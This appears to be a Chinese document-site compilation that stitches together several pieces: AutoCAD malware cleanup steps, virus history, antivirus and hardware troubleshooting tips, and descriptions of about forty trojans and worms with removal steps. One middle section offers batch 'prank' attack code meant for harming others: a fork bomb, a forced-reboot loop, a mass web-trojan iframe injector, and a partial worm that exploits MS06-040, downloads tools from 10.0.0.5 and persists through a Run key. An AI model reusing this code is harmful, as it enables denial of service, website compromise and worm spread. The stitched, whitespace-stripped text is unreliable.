40种电脑常见病毒
- 格式:doc
- 大小:99.50 KB
- 文档页数:10
常见AutoCAD病毒(acad.fas、acad.lsp)清除方法没有删除干净吧。
“CAD恶意程序”网上也称之为“CAD病毒”。
其实,常见的CAD恶意程序并不具备一般病毒特征,不能单独传染,不会感染系统文件,只能在CAD环境下传播,没有对系统产生危害,但会造成CAD 部份命令失效(如:无法使用分解命令、鼠标中键平移被修改、填充不能使用、多段线空心等),使其操作不便,从而影响制图效率及质量。
CAD恶意程序清除工具,支持CAD2002-2010版本。
程序根据“病毒及信任文件”列表搜索、删除CAD恶意程序并清除其加载项。
大家在工作中,打开自己或别人拷贝来的DWG文件前,不要忙着打开CAD,先看看这个DWG图纸目录内,有没有acad.lsp、acad.fas和acad.vlx这些的文件,有就应该立即清除该文件。
这样可以大大减少“CAD恶意程序”传播的机会。
手工清除方法:①、关闭CAD(一定要关闭正在运行中的CAD程序);②、按F3键或在“开始”菜单打开“搜索”→“文件或文件夹”搜索窗口,全盘搜索下面的已知可能是CAD恶意程序的文件名;acad.lspacad.fasacad.vlxacad.sysacaddoc.lspacadiso.lspacaddoc.fasacadapq.lspacadappp.lspacadapp.lsplcm.fasacadsmu.fas搜索发现文件后,注意该文件的所在目录,判断这个文件是不是你正在使用的某些外挂插件或专业软件所用到的自动加载文件,再决定是否删除。
注意:“搜索范围”一定要选择“本地硬盘(C:;D:;E:;...)”,并勾选“搜索选项”中的“高级选项”,将其下的“搜索系统文件夹”、“搜索隐藏的文件和文件夹”和“搜索子文件夹”项都勾选上,否则不能完全搜索出这些文件。
③、复制代码“(setvar "zoomfactor" 40)(setvar "mbuttonpan"1)(setvar "highlight" 1)(se tvar "fillmode" 1)(setvar "pickauto" 1)”粘贴在CAD命令行,恢复被修改的系统变量;④、清除残留的加载项,复制“(startapp "notepad" (findfile "acad.mnl"))”在CAD命令行,打开“acad.mnl”文件,查看文件内是否有类似“(load "acadappp")”或“(load "acadappp.lsp")”这样的内容,有则删去这些内容后保存“acad.mnl”文件;无可忽略此操作。
三一文库()〔bat整人电脑病毒代码是怎样的〕*篇一:一些bat恶搞代码第一个:让别人内存OVER(逼他重启)@echooffstartcmd%0就这3行了第二个:让对方重启指定次数(害人专用)@echooffifnotexistc:\1.txtecho.c:\1.txtgotoerr1 ifnotexistc:\2.txtecho.c:\2.txtgotoerr1 ifnotexistc:\3.txtecho.c:\3.txtgotoerr1 ifnotexistc:\4.txtecho.c:\4.txtgotoerr1 ifnotexistc:\5.txtecho.c:\5.txtgotoerr1gotoerr2:err1shutdown-s-t0:err2上面可以让对方电脑重启5次后不在重启第三个:自动踢人(3389肉机保护自己专用)@echoofflogoff1dellog.batlogoff后面的1改成自己登陆的ID号,用queryuser查看第四个:批量自动溢出@for/f%%iin(result.txt)do42%%i58.44.89.158521先自己用NC监听端口,多开几个,然后指行,就自动溢出了第五个:自动挂马改主页@echooffclsrem直接打批处理名字就有帮助title批量挂马,改首页(伤脑筋QQ:447228437).colorAsetpan=%1setye=%2setdai=%3if"%pan%"==""gotoe1if"%ye%"==""gotoe1if"%dai%"==""gotoe1if"%dai%"=="htm.txt"gotou1forfiles/p%pan%/m%ye%/s/c"cmd/cif@isdir==FALSEecho^ iframesrc=":%dai%"width="0"height="0"frameborder="0 "^@path"echo.echo代码全部插入完毕echo.pausegotoe1:u1echo您现在的操作将使%pan%盘下,全部名为%ye%的内容变为您要更改的内容.echo这将是非常危险的,您真的要这样做?回车却认,Ctrl+c取消操作.pauseforfiles/p%pan%/m%ye%/s/c"cmd/cif@isdir==FALSEcopy% 1\htm.txt@path/y"echo.echo首页全部更改完必如果您发现没有替换成功,请将%ye%文件只读属性去掉.echo.pause:e1echo.echo本批处理只适用于2003系统,其他系统要使用,请将forfiles.exe拷贝至系统盘system32目录下echo用法:snj^搜索盘符^^文件名^^网马地址^echo例子:snjd:\index.asp/mm.htmecho批处理将自动添加^iframe^标记echo.echo如果您要更改全部网站的首页!请在批处理文件所在目录下,新建一个名为htm.txt的文本文件.echo然后将要更改的代码加COPY到里面保存.然后将命令的^网马地址^项输入为htm.txt即可.echo例子:snjd:\index.asphtm.txtecho.echo为了能准确无误执行批处理请最好先把记事本的"自动换行功能去掉",让命令保持在一行才能正确执行.echo.echo使用此批处理造成一切后果本人概不负责,请大家谨慎使用!echo.第六个:利用批处理编写利用系统漏洞传播的蠕虫病毒本来想写完后在做教程,要去学校了,所以先把思路告诉大家,大家可以先自己写写,我有时间写完发到群里.这些是我未完成的批处理,大家可以在此基础上按照我下面说的思路继续写完delc:\42.exedelc:\nc.exedelc:\ip.exeechodimwsh%systemroot%\help\test.vbsechosetwsh=CreateObject("WScript.Shell")%systemroot%\help\ test.vbsechowsh.run"cmd/c%systemroot%\help\nc-v-l-p 810%systemroot%\help\or.txt",0%systemroot%\help\te st.vbsechodimwsh%systemroot%\help\test2.vbsechosetwsh=CreateObject("WScript.Shell")%systemroot%\help\ test2.vbsechowsh.run"cmd/cstart%systemroot%\help\good.bat",0%systemroot%\help\test2.vbsechoopen10.0.0.5%systemroot%\help\ftp.txt echoopenmyyes%systemroot%\help\ftp.txtecho1%systemroot%\help\ftp.txtechobinary%systemroot%\help\ftp.txtechoget42.exec:\42.exe%systemroot%\help\ftp.txt echogetnc.exec:\nc.exe%systemroot%\help\ftp.txt echogetip.exec:\ip.exe%systemroot%\help\ftp.txt echobye%systemroot%\help\ftp.txtechoechoSetxPost=CreateObject("Microsoft.XMLHTTP") ^1.vbs%systemroot%\help\or.txtechoechoxPost.Open"GET",":10.0.0.5/my.exequo...,0 ^^1.vbs%systemroot%\help\or.txtechoechoxPost.Send()^^1.vbs%systemroot%\help\or.txt echoechoSetsGet=CreateObject("ADODB.Stream")^^1.vbs%systemroot%\help\or.txtechoechosGet.Mode=3^^1.vbs%systemroot%\help\or.txte choechosGet.Type=1^^1.vbs%systemroot%\help\or.txtec hoechosGet.Write(xPost.responseBody)^^1.vbs%systemroot%\help\or.txtechoechosGet.SaveToFile"d:\my.exe",2^^1.vbs%systemroot%\help\or.txtechoecho1.vbs^^1.vbs%systemroot%\help\or.txtechoechomy.exe^^1.vbs%systemroot%\help\or.txtechoWindowsRegistryEditorVersion5.00%systemroot%\he lp\1.regecho[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run]%systemroot%\help\1.regecho"SKYNETPersonalFireWall"="F:\\系统安全工具\\FireWall\\PFW.exe"%systemroot%\help\1.regecho"1"="%systemroot%\\help\\test2.vbs"%systemroot% \help\1.regifnotexist%systemroot%\help\good.batcopygood.bat%systemroot%\help\good.bat%systemroot%\help \test2.vbsdelgood.batregedit-s%systemroot%\help\1.regftp-s:%systemroot%\help\ftp.txtmovec:\nc.exe%systemroot%\help\/ymovec:\42.exe%systemroot%\help\/ymovec:\ip.exe%systemroot%\help\/y%systemroot%\help\test.vbsremfor/f%%iin(result1.txt)doseta=%%iremfor/f%%jin(result.txt)do42%a%%%j810准备:1:找一个反向连接的溢出攻击程序,如ms06040漏洞2:找呀一个免费FTP空间,最好是送域名的3:利用你所知道的高级语言编写一个,能生成随机范围IP地址和找到本机IP的工具.思路:用for语句对指定文本里的IP进行溢出,然后用if语句判断是否溢出成功,如果成功开启一个NC监听端口,NC后面带一个输入符号输入的内容为下载本批处理文件,然后执行这个批处理.这样被溢出的机器就又会在他那里运行我门的批处理,从而到自动传播的目的.把批处理生成的文件集中放到一个目录下,可以%systemroot%系统变量直接放到系统目录下因为批处理运行后会闪出命令行窗口,我门可以利用VBS脚本来运行我们的批处理,这样就不会有任何窗口出现,脚本如下echodimwsh%systemroot%\help\test.vbsechosetwsh=CreateObject("WScript.Shell")%systemroot%\help\ test.vbsechowsh.run"cmd/c%systemroot%\help\nc-v-l-p 810%systemroot%\help\or.txt",0%systemroot%\help\te st.vbs生成随机IP工具的VB代码PrivateSubForm_Load()DimfsoAsNewFileSystemObjectDima,b,c,dAsIntegerDimph,eAsStringph=App.Path"\""ip.txt"Randomizea=Int(253*Rnd+1)b=Int(253*Rnd+1)c=Int(240*Rnd+1)OpenphForOutputAs#1Fori=cToc+7Forj=1To254e=a"."b"."i"."jPrint#1,eDoEventsNextjNextiClose#1UnloadMeEndSub*篇二:整人“病毒”代码(一)发表于2013-10-2310:33前段时间看到大家对这种整人的代码兴趣还挺浓厚的,我最近就收集了一些和大家分享。
计算机病毒的历史计算机病毒的形成有着悠久的历史,并还在不断地发展。
下面我们来回顾计算机病毒的产生和发展的历史。
计算机刚刚诞生,就有了计算机病毒的概念。
1949年,计算机之父冯·诺依曼在《复杂自动机组织论》中便定义了计算机病毒的概念--即一种"能够实际复制自身的自动机"。
1960年,美国的约翰·康维在编写"生命游戏"程序时,首先实现了程序自我复制技术。
他的游戏程序运行时,在屏幕上有许多"生命元素"图案在运动变化。
这些元素过于拥挤时,会因缺少生存空间而死亡。
如果元素过于稀疏会由于相互隔绝失去生命支持系统,也会死亡。
只有处于合适环境的元素才非常活跃,它们能够自我复制并进行传播。
贝尔实验室的三位年轻程序员也受到冯·诺依曼理论的启发,发明了"磁心大战"游戏。
玩这个游戏的两个人编制许多能自身复制、并可保存在磁心存储器中的程序,然后发出信号。
双方的程序在指令控制下就会竭力去消灭对方的程序。
在预定的时间内,谁的程序繁殖得多,谁就得胜。
这种有趣的游戏很快就传播到其他计算机中心。
由于这种程序与生物医学上的"计算机病毒"同样具有传染和破坏的特性,所以后来就把这种具有自我复制和破坏机理的程序称为计算机病毒。
1、国外情况概述80年代起,IBM公司的PC系列微机因为性能优良,价格便宜逐渐成为世界微型计算机市场上的主要机型。
但是由于IBM PC系列微型计算机自身的弱点,尤其是DOS操作系统的开放性,给计算机病毒的制造者提供了可乘之机。
因此,装有DOS操作系统的微型计算机成为病毒攻击的主要对象。
1983年出现了研究性计算机病毒报告。
1987年,世界各地的计算机用户几乎同时发现了形形色色的计算机病毒,如大麻、IBM圣诞树、黑色星期五等等。
面对计算机病毒的突然袭击,众多计算机用户甚至专业人员都惊慌失措。
史上危害最大的电脑病毒有哪些在计算机发展至今的岁月里,病毒都是一个绕不开的话题。
病毒的危害大家都有所了解但是史上危害最大的病毒你又知道几个?下面就让店铺给大家说说史上危害最大的电脑病毒是哪些吧。
史上危害最大的电脑病毒1.I LOVE YOUILOVEYOU也许是计算机历史当中最危险的病毒。
在当年,它感染了将近10%的可联网计算机,造成的经济损失高达100亿美元。
这种病毒是通过电子邮件所传播的,其邮件标题就是“ILOVEYOU”。
为了进一步增加诱惑力,又见当中还附带着一个题为“Love-Letter-For-You.TXT.vbs(给你的情书)”。
如果你打开该文件,病毒会自动向Windows地址簿当中保存的前50个联系人发送相同的邮件。
2.MelissaMelissa计算机病毒在1999年3月26日登上了新闻头条。
这种病毒同样通过邮件传播,并会包含一个名为“list.doc”的附件。
点开附件之后,病毒会寻找到微软Outlook地址簿当中的前50个联系人,然后向他们发送一封题为“这是你要的文件……不要给其他人看”的邮件。
随后,FBI逮捕了病毒的制作者David L Smith,此人声称自己编写这条病毒是是为了纪念一位一见倾心的脱衣舞女郎,她的名字就叫Melissa。
3.My DoomMy Doom是2004年爆发的病毒,它通过电子邮件传播,发件人地址和邮件主题完全随机,它所感染的计算机数量约为200万部。
这种病毒的行为方式非常狡诈,收件人在收到邮件之后会看到一个类似于错误弹窗的窗口,当中写着“邮件处理失败”。
而在点击该信息之后,其附件中的蠕虫病毒便会开始工作,向电脑地址簿内保存的地址继续发送邮件。
外界认为,My Doom所造成的经济损失可能达到了380亿美元。
4.Code Red通过利用微软Internet Information Server的漏洞,2001年出现的Code Red病毒开始将网络服务器作为攻击目标。
电脑杀毒软件打不开怎么办很多时候我们电脑中毒都是利用杀毒软件杀毒,十分方便操作简单,但是当杀毒软件打不开是怎么回事呢?下面小编就和大家说一下Win7电脑中毒杀毒软件打不开的解决方法。
步骤如下:一、【强制运行程序】1、首先我们需要打开你电脑的任务管理器,这个是任何状态下都可以弹出的,按住键盘上面的CTRL+ALT+DEL呼出来。
2、呼出任务管理器之后呢,我们再点击右上角,一般都会有一个新建的按钮,点击一下打开新建窗口,在里面找到【新建任务运行】。
3、打开运行后,在里面输入你要打开的程序,比如说杀毒软件,就是360杀毒软件,输入360杀毒软件.exe,然后点击运行就会弹出杀毒窗口了。
二、【开始用360杀毒软件杀毒】1、弹出杀毒软件的窗口后,在里面继续找到病毒查杀功能按钮,然后点击一下打开杀毒界面,在里面选择进行杀毒。
2、打开病毒查杀后,在右上角你可以直接点击快速杀毒,这样检测速度比较快,检测到被劫持的系统敏感区域,释放电脑的权限。
3、检测完成后,再去用全盘杀毒功能,再对全盘进行检测查杀,直到检测结果为安全后,再去正常使用电脑,这样就没什么问题了。
补充:电脑常见的病毒:1.文件型病毒文件型病毒是一种受感染的可执行文件,也就是.exe病毒文件。
当执行受感染的文件时,电脑病毒会将自己复制到其他可执行文件中,导致其他文件受感染。
2.宏病毒宏病毒专门感染Word文档,是利用微软的VB脚本语言开发出来的程序,以宏的方式附在Word文档中,称之为宏病毒。
3.特洛伊木马黑客常利用特洛伊木马,来窃取用户的密码资料或破坏硬盘内程序或数据的目的,它看似是一个正常的程序,但执行时隐藏在其背后的恶意程序也将随之行动,就会对电脑进行破坏。
但该特洛伊木马不会自行复制,因此往往是以伪装的样式诱骗电脑用户将其置入电脑中。
4.蠕虫病毒蠕虫病毒蠕虫病毒利用网络快速地扩散,从而使更多的电脑遭受病毒的入侵,是一种自行复制的可由网络扩散的恶意程序。
电脑硬件常见故障检测及处理方法我们在日常生活、工作中肯定会遇到电脑硬件引起的一些故障,这个时候,如果你不懂如何检测及处理硬件故障,则会对我们的生活、工作造成很大的不便;本文就针对我们在使用电脑中常遇到的几种硬件故障,总结了几种代表性的电脑故障及处理方法,希望对大家有一定的帮助;一、什么是电脑硬件故障电脑硬件故障是由硬件引起的故障,涉及各种板卡、存储器、显示器、电源等。
常见的硬故障有如下一些表现。
①电源故障,导致系统和部件没有供电或只有部分供电。
②部件工作故障,计算机中的主要部件如显示器、键盘、磁盘驱动器、鼠标等硬件产生的故障,造成系统工作不正常。
③元器件或芯片松动、接触不良、脱落,或者因温度过热而不能正常运行。
④计算机外部和内部的各部件间的连接电缆或连接插头(座)松动,甚至松脱或者错误连接。
⑤系统与各个部件上及印制电路的跳线连接脱落、连接错误,或开关设置错误,而构成非正常的系统配置。
⑥系统硬件搭配故障,各种电脑芯片不能相互配合,在工作速度、频率方面不具有一致性等。
二、硬件故障的常用检测方法目前,计算机硬件故障的常用检测方法主要有以下几种。
1.清洁法对于使用环境较差或使用较长时间的计算机,应首先进行清洁。
可用毛刷轻轻刷去主板、外设上的灰尘。
如果灰尘已清洁掉或无灰尘,就进行下一步检查。
另外,由于板卡上一些插卡或芯片采用插脚形式,所以,震动、灰尘等其他原因常会造成引脚氧化,接触不良。
可用橡皮擦去表面氧化层,重新插接好后,开机检查故障是否已被排除。
2.直接观察法直接观察法即“看、听、闻、摸”。
①“看”即观察系统板卡的插头、插座是否歪斜,电阻、电容引脚是否相碰,表面是否烧焦,芯片表面是否开裂,主板上的铜箔是否烧断。
还要查看是否有异物掉进主板的元器件之间(造成短路)。
也应查看板上是否有烧焦变色的地方,印制电路板上的走线(铜箔)是否断裂等。
②“听”即监听电源风扇、硬盘电机或寻道机构等设备的工作声音是否正常。
另外,系统发生短路故障时常常伴随着异常声响。
一,简介计算机病毒(Computer Virus)是编制者在计算机程序中插入的破坏计算机功能或者数据的代码,能影响计算机使用,能自我复制的一组计算机指令或者程序代码。
计算机病毒具有传播性、隐蔽性、感染性、潜伏性、可激发性、表现性或破坏性。
计算机病毒的生命周期:开发期→传染期→潜伏期→发作期→发现期→消化期→消亡期。
计算机病毒是一个程序,一段可执行码。
就像生物病毒一样,具有自我繁殖、互相传染以及激活再生等生物病毒特征。
计算机病毒有独特的复制能力,它们能够快速蔓延,又常常难以根除。
它们能把自身附着在各种类型的文件上,当文件被复制或从一个用户传送到另一个用户时,它们就随同文件一起蔓延开来。
二,几种常见的病毒1,木马病毒:指通过特定的程序(木马程序)来控制另一台计算机。
木马通常有两个可执行程序:一个是控制端,另一个是被控制端。
木马这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的特洛伊木马本意是特洛伊的,即代指特洛伊木马,也就是木马计的故事)。
“木马”程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种主机的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种主机。
木马病毒的产生严重危害着现代网络的安全运行。
(1):特征:1、隐蔽性是其首要的特征如其它所有的病毒一样,木马也是一种病毒,它必需隐藏在你的系统之中,它会想尽一切办法不让你发现它。
很多人的对木马和远程控制软件有点分不清,因为我前面讲了木马程序就要通过木马程序驻留目标机器后通过远程控制功能控制目标机器。
实际上他们两者的最大区别就是在于这一点,举个例子来说吧,象我们进行局域网间通讯的常软件——PCanywhere大家一定不陌生吧,大家也知道它是一款远程通讯软件。
PCanwhere在服务器端运行时,客户端与服务器端连接成功后客户端机上会出现很醒目的提示标志。
特洛伊木马是一种恶意程序,它们悄悄地在宿主机器上运行,就在用户毫无察觉的情况下,让攻击者获得了远程访问和控制系统的权限。
一般而言,大多数特洛伊木马都模仿一些正规的远程控制软件的功能,如Symantec的pcAnywhere,但特洛伊木马也有一些明显的特点,例如它的安装和操作都是在隐蔽之中完成。
攻击者经常把特洛伊木马隐藏在一些游戏或小软件之中,诱使粗心的用户在自己的机器上运行。
最常见的情况是,上当的用户要么从不正规的网站下载和运行了带恶意代码的软件,要么不小心点击了带恶意代码的邮件附件。
大多数特洛伊木马包括客户端和服务器端两个部分。
攻击者利用一种称为绑定程序的工具将服务器部分绑定到某个合法软件上,诱使用户运行合法软件。
只要用户一运行软件,特洛伊木马的服务器部分就在用户毫无知觉的情况下完成了安装过程。
通常,特洛伊木马的服务器部分都是可以定制的,攻击者可以定制的项目一般包括:服务器运行的IP端口号,程序启动时机,如何发出调用,如何隐身,是否加密。
另外,攻击者还可以设置登录服务器的密码、确定通信方式。
服务器向攻击者通知的方式可能是发送一个email,宣告自己当前已成功接管的机器;或者可能是联系某个隐藏的Internet交流通道,广播被侵占机器的IP地址;另外,当特洛伊木马的服务器部分启动之后,它还可以直接与攻击者机器上运行的客户程序通过预先定义的端口进行通信。
不管特洛伊木马的服务器和客户程序如何建立联系,有一点是不变的,攻击者总是利用客户程序向服务器程序发送命令,达到操控用户机器的目的。
特洛伊木马攻击者既可以随心所欲地查看已被入侵的机器,也可以用广播方式发布命令,指示所有在他控制之下的特洛伊木马一起行动,或者向更广泛的范围传播,或者做其他危险的事情。
实际上,只要用一个预先定义好的关键词,就可以让所有被入侵的机器格式化自己的硬盘,或者向另一台主机发起攻击。
攻击者经常会用特洛伊木马侵占大量的机器,然后针对某一要害主机发起分布式拒绝服务攻击(Denial of Service,即DoS),当受害者觉察到网络要被异乎寻常的通信量淹没,试图找出攻击者时,他只能追踪到大批懵然不知、同样也是受害者的DSL或线缆调制解调器用户,真正的攻击者早就溜之大吉。
40种常见病毒及处理1. Trojan.PSW.Win32.Mapdimp.a病毒运行后有以下行为:1.病毒释放midimap??.dll和midimap??.dat的文件到系统目录(??代表两个随机字母)。
我们可以首先利用Windows的搜索功能在系统目录下搜索名为midimap??.dll的文件(注意:midimap.dll不是病毒,后面必须有两个随机字母且midimap??.dll和midimap??.dat是成对出现的才是病毒)2.病毒还会修改注册表信息达到开机被自动加载的目的。
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4F4F0064-71E 0-4f0d-0018-708476C7815F} 指向midimap??.dll文件开始-运行-输入regedit 打开注册表编辑器展开:HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID然后在下面查找有无{4F4F0064-71E0-4f0d-0018-708476C7815F}的子键如果有展开该子键,此时我们会看到该子键指向了病毒文件%systemroot%\system32\midimap??.dll如果这时看到的midimap??.dll文件名和刚才搜索到的文件相同,则证明中毒了。
图33.另外,熟知Process Explorer的朋友亦可用Process Explorer查找explorer.exe的线程里面是否有midimap??.dll4.病毒运行后会访问黑客指定的网址下载其他木马病毒,盗取网游账号,并将盗取的信息在后台发送给黑客,使网游玩家的利益受损。
手动处理方法:第一步,删除病毒文件:使用wsyscheck工具,文件管理,进入系统目录(默认为c:\windows\system32)找到midimap??.dll和midimap??.dat 文件,在文件上面点击右键,选择“发送到重启删除列表中”。
第二步,删除被病毒修改的注册表键值:1、使用wsyscheck工具或使用注册表编辑器,删除以下键值内容:HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4F4F0064-71E 0-4f0d-0018-708476C7815F}的值“c:\windows\system32\midimap??.dll”2、重启计算机。
2.Trojan.PSW.Win32.GameOL.qku.盗号木马病毒这是一个偷游戏密码的病毒。
病毒采用Delphi语言编写,Upack加壳。
病毒运行后会释放一个名称为随机8位字母组合的exe和名称为随机八位字母组合的dll文件,设置自身属性为系统,隐藏,改写注册表项实现自启动。
病毒会把动态库注入到Explorer.exe进程中并查找进程中是否存在游戏进程,当找到游戏进程时,把自己注到游戏进程中,获取用户输入的账号密码并发送到指定的网址。
运行完毕之后,该病毒还会删除自身,逃避杀毒软件的查杀。
(依赖系统:Windows NT/2000/XP/2003)3.Trojan.DL.Win32.Mnless. bdz 木马病毒这是一个木马下载器病毒。
病毒运行后会把自身复制到系统目录下,加载后会从黑客指定网站下载各种盗号木马、病毒等恶意程序,在系统目录下保存病毒文件名为6位或8位的EXE 文件,并在用户计算机上运行。
同时,这些病毒都会修改注册表启动项,实现随系统自启动,给用户的查杀和正常使用计算机带来极大的不便。
(依赖系统:Windows NT/2000/XP/2003)4.Trojan.PSW.Win32.GameOL.qli 盗号木马病毒这是一个偷游戏密码的病毒。
病毒采用Delphi语言编写,Upack加壳。
病毒运行后会释放一个名称为随机8位字母组合的exe和名称为随机八位字母组合的dll文件,设置自身属性为系统,隐藏,改写注册表项实现自启动。
病毒会把动态库注入到Explorer.exe进程中并查找进程中是否存在游戏进程,当找到游戏进程时,把自己注到游戏进程中,获取用户输入的账号密码并发送到指定的网址。
运行完毕之后,该病毒还会删除自身,逃避杀毒软件的查杀。
5.Worm.Win32.DownLoader.iz蠕虫病毒病毒运行后,会释放一个名字为beep.sys的驱动,替换掉系统的同名文件,恢复SSDT列表。
关闭一些安全软件的服务,结束一些安全软件的进程,以躲避对其的查杀。
随后会替换dllcache和system32目录中的wuauclt.exe,然后把自己复制到该目录下并且改名为wuauclt.exe,在每一个盘符下面生成AUTORUN.INF和YS.PIF,达到再次运行和传播病毒的目的,写入注册表启动项,以实现开机自动启动。
最终病毒会访问指定网页下载大量病毒到本地运行,容易反复感染,彻底清除困难。
依赖系统:Windows NT/2000/XP/20036.Backdoor.Win32.Gpigeon2007.cel 灰鸽子病毒该病毒运行时会首先将自身拷贝到系统目录下,并设置成隐藏、系统、只读属性。
然后病毒会创建系统服务,实现随系统自启动。
它还会新建IE进程并设置该进程为隐藏,然后将病毒自身插入该进程中。
通过在后台记录用户键盘操作,病毒会偷取用户信息和本地系统信息等,并将该信息发送给黑客。
如此用户计算机将被远程控制,不自主地删除文件,远程下载上传文件,修改注册表等等,给用户的计算机和隐私安全带来很大隐患。
7.Worm.Win32.DownLoad.iy 蠕虫病毒病毒把自己伪装成一个图片的样子,名字叫“照片”并且有很长的空格,如果不易发现扩展名是EXE,诱惑用户打开。
病毒运行后会关闭大量的安全软件,以躲避对其的查杀,随后会删除dllcache中的wuauclt.exe,然后把自己复制到该目录下并且改名为wuauclt.exe,再删除system32下的wuauclt.exe,复制自己到该目录下命名为wuauclt.exe,在每一个盘符下面生成AUTORUN.INF和WINDOWS.PIF,达到再次运行和传播病毒的目的,写入注册表启动项,以实现开机自动启动。
最终病毒会访问指定网页下载大量病毒到本地运行,容易反复感染,彻底清除困难。
8.Worm.Win32.Agent. znu 蠕虫病毒这是一个蠕虫病毒。
病毒运行后会把自己复制到系统目录下,并修改注册表启动项实现开机自启动。
同时病毒修改注册表信息,来禁用系统任务管理器,禁止WINDOWS自动升级,将系统文件和隐藏文件设置为不可见,以及锁定用户默认浏览器主页,并且试图关闭杀毒软件和安全工具。
当病毒发现有标题为“瑞星主动防御”或者“恶意行为检测”的对话框时,就发消息模拟鼠标点击不处理,以此躲避杀毒软件查杀。
它还会从网上下载新的木马病毒,并在可移动存储设备写入病毒,以此传播9.Worm.Win32.DownLoader.cm 蠕虫病毒病毒把自己伪装成一个图片的样子,名字叫“照片”并且有很长的空格,如果不易发现扩展名是EXE,诱惑用户打开。
病毒运行后会关闭大量的安全软件,以躲避对其的查杀,随后会删除dllcache中的wuauclt.exe,然后把自己复制到该目录下并且改名为wuauclt.exe,再删除system32下的wuauclt.exe,复制自己到该目录下命名为wuauclt.exe,在每一个盘符下面生成AUTORUN.INF和WINDOWS.PIF,达到再次运行和传播病毒的目的,写入注册表启动项,以实现开机自动启动。
最终病毒会访问指定网页下载大量病毒到本地运行,容易反复感染,彻底清除困难。
10.Trojan.Win32.Undef.qls这是一个木马病毒。
病毒运行后会将自身文件复制到系统目录下,并修改注册表启动项,实现随系统自启动。
病毒会将自身注入到系统正常进程,给用户查杀病毒带来困难。
此外,病毒会试图关闭多种杀毒软件和安全工具,并会纪录用户键盘和鼠标操作,窃取用户的网游的帐号、密码等隐私信息。
11.Trojan.DL.Win32.Mnless. bci这是一个木马下载器病毒。
病毒运行后会把自身复制到系统目录下,加载后会从黑客指定网站下载各种盗号木马、病毒等恶意程序,在系统目录下保存病毒文件名为6位或8位的EXE 文件,并在用户计算机上运行。
同时,这些病毒都会修改注册表启动项,实现随系统自启动。
12.Trojan.DL.Win32.Mnless. bch这是一个木马下载器病毒。
病毒运行后会把自身复制到系统目录下,加载后会从黑客指定网站下载各种盗号木马、病毒等恶意程序,在系统目录下保存病毒文件名为6位或8位的EXE 文件,并在用户计算机上运行。
同时,这些病毒都会修改注册表启动项,实现随系统自启动。
13.Backdoor.Win32.Gpigeon2008.ee这是一种灰鸽子后门变种,该病毒运行时会首先将自身拷贝到系统目录下,并设置成隐藏、系统、只读属性。
然后病毒会创建系统服务,实现随系统自启动。
它还会新建IE进程并设置该进程为隐藏,然后将病毒自身插入该进程中。
通过在后台记录用户键盘操作,病毒会偷取用户信息和本地系统信息等,并将该信息发送给黑客。
如此用户计算机将被远程控制,不自主地删除文件,远程下载上传文件,修改注册表等等。
14.Trojan.DL.Win32.Undef.aon这是一个木马下载器病毒。
该病毒运行后会释放一个动态库文件,该文件会从黑客指定网站下载一个config.ini文件,并且从下载的config.ini文件中获取具体要下载的木马、病毒的地址,然后下载到用户计算机上并执行。
15.Trojan.PSW.Win32.GameOL.qaa这是一种网路游戏盗号木马,病毒采用Delphi语言编写,Upack加壳。
病毒运行后会释放一个名称为随机8位字母组合的exe和名称为随机八位字母组合的dll文件,设置自身属性为系统,隐藏,改写注册表项实现自启动。
病毒会把动态库注入到Explorer.exe进程中并查找进程中是否存在游戏进程,当找到游戏进程时,把自己注到游戏进程中,获取用户输入的账号密码并发送到指定的网址。
运行完毕之后,该病毒还会删除自身,逃避杀毒软件的查杀。
16.Rootkit.Win32.RESSDT.eh这是个Rootkit病毒驱动,通常与其它盗号木马病毒结合传播。
该驱动运行之后,可以通过用户层计算出来的服务函数地址和索引,在驱动层恢复SSDT(系统服务描述符表),这样可以使某些反病毒软件的自我保护和监控失效。
杀毒软件失效之后,别的病毒和木马就可以对系统进行肆意破坏。
17.Worm.Win32.DownLoader.ir病毒把自己伪装成一个图片的样子,名字叫“照片”并且有很长的空格,如果不易发现扩展名是EXE,诱惑用户打开。